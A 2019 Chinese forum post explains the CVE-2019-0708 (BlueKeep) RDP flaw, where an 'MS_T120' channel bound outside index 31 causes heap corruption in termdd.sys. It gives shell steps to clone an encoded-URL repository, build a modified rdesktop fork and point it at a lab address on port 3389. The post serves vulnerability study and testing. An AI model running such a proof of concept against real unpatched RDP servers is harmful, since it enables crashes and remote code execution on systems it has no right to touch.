-
-
[分享][原创]CVE-2019-0708RDP漏洞PoC
-
发表于: 2019-5-23 01:22
-
该漏洞是由于“MS_T120”SVC名称在RDP协议的GCC(GENERAL CONFERENCE CONTROL)会话初始化序列期间被绑定为数字31的参考信道。
此通道名称由Microsoft在内部使用,并且客户端没有明显的合法用例来请求通过名为“MS_T120”的SVC进行连接。
【SVC = "MS_T120" and Channel != 31】
在GCC会话初始化期间,客户端提供服务器未列入白名单的频道名称,这意味着攻击者可以在31以外的频道上设置另一个名为“MS_T120”的SVC。
在31以外的频道中使用MS_T120这会导致堆内存损坏和远程代码执行(RCE)。
MS_T120通道管理中涉及的组件在rdpwsx.dll和rdpwp.sys中分配的堆池中创建.MS_D120引用通道。
当在31以外的通道索引的上下文中处理MS_T120引用通道时,堆损坏发生在termdd.sys中。
Ubuntu ,kali下载ruby脚本编译:
git clone 397K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6*7k6i4u0G2M7%4g2E0x3s2R3H3i4K6u0r3b7#2k6q4i4K6u0V1x3U0l9I4z5g2)9J5k6o6l9%4x3o6S2Q4x3X3g2Y4K9i4b7`.
cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
apt-get install dh-autoreconf
apt-get install libssl-dev
./bootstrap
./configure --disable-credssp --disable-smartcard
make
./rdesktop 192.168.50.128:3389
cmd开启3389测试:
开启
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2019-7-12 15:35
被0xbird编辑
,原因:
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
